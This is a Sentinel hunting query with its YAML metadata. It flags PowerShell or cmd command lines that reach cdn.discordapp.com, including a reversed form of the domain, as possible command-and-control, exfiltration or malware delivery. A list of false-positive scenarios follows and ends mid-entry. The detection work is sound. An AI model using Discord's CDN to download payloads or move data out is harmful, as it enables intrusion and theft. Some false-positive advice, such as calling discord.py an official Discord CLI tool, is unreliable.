Hosts executing commands to interact with the Discord CDN via the command line may indicate adversarial C2 activity or exfiltration, as this behavior deviates from normal usage patterns. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify potential malware or persistent access mechanisms leveraging Discord infrastructure.
KQL Query
imProcess
| where Process has_any ("powershell.exe", "powershell_ise.exe", "cmd.exe") or CommandLine has "powershell"
| where CommandLine has_any ("cdn.discordapp.com", "moc.ppadrocsid.ndc")
| project-reorder TimeGenerated, Dvc, User, Process, CommandLine
| extend NTDomain = tostring(split(User,'\\',0)[0]), Name = tostring(split(User,'\\',1)[0])
| extend HostName = tostring(split(Dvc, '.', 0)[0]), DnsDomain = tostring(strcat_array(array_slice(split(Dvc, '.'), 1, -1), '.'))
| extend Account_0_Name = Name
| extend Account_0_NTDomain = NTDomain
| extend Host_0_HostName = HostName
| extend Host_0_DnsDomain = DnsDomain
id: 3169dc83-9e97-452c-afcc-baebdb0ddf7c
name: Discord download invoked from cmd line (ASIM Version)
description: |
'This hunting query looks for hosts that have attempted to interact with the Discord CDN. This activity is not normally invoked from the command line and could indicate C2, exfiltration, or malware delivery activity.'
requiredDataConnectors: []
tactics:
- Execution
- CommandAndControl
- Exfiltration
relevantTechniques:
- T1204
- T1102
- T1567
query: |
imProcess
| where Process has_any ("powershell.exe", "powershell_ise.exe", "cmd.exe") or CommandLine has "powershell"
| where CommandLine has_any ("cdn.discordapp.com", "moc.ppadrocsid.ndc")
| project-reorder TimeGenerated, Dvc, User, Process, CommandLine
| extend NTDomain = tostring(split(User,'\\',0)[0]), Name = tostring(split(User,'\\',1)[0])
| extend HostName = tostring(split(Dvc, '.', 0)[0]), DnsDomain = tostring(strcat_array(array_slice(split(Dvc, '.'), 1, -1), '.'))
| extend Account_0_Name = Name
| extend Account_0_NTDomain = NTDomain
| extend Host_0_HostName = HostName
| extend Host_0_DnsDomain = DnsDomain
entityMappings:
- entityType: Account
fieldMappings:
- identifier: Name
columnName: Name
- identifier: NTDomain
columnName: NTDomain
- entityType: Host
fieldMappings:
- identifier: HostName
columnName: HostName
- identifier: DnsDomain
columnName: DnsDomain
version: 1.0.1
metadata:
source:
kind: Community
author:
name: Pete Bryan
support:
tier: Community
categories:
domains: [ "Security - Threat Protection" ]Scenario: System Administrator Installs Discord via Command Line
Description: A system admin uses the command line to download and install Discord on a Windows machine using a script or package manager.
Filter/Exclusion: Check for the presence of discord.exe in known installation directories (e.g., C:\Program Files\Discord) or verify the process is initiated by a known admin account with a legitimate script.
Scenario: Scheduled Job for Discord Update via CLI
Description: A scheduled task is configured to run a script that downloads Discord updates using curl or wget from the official CDN.
Filter/Exclusion: Filter by the source IP of the CDN (discord.com) and verify the script is signed or originates from a trusted internal repository.
Scenario: Developer Uses Discord CLI Tool for Bot Management
Description: A developer uses the official Discord CLI tool (discord.py or discord.js) to manage a bot, which may involve downloading assets or interacting with the Discord API.
Filter/Exclusion: Check for the presence of known Discord CLI tools in the process name or command line arguments, and verify the process is running under a developer account.
Scenario: IT Team Uses PowerShell to Deploy Discord on Multiple Hosts
Description: An IT team uses a PowerShell script to deploy Discord on multiple endpoints, which may involve downloading the installer via the command line.
Filter/Exclusion: Filter by the presence of a known IT deployment script or verify the process is initiated by a service account with elevated privileges and a documented deployment process.
Scenario: Security Tool or SIEM Agent Uses Discord for Alert Notification
Description: A security tool or SIEM agent is configured to send alerts to a Discord channel using a webhook, which may involve a command line invocation to send messages.
Filter/Exclusion: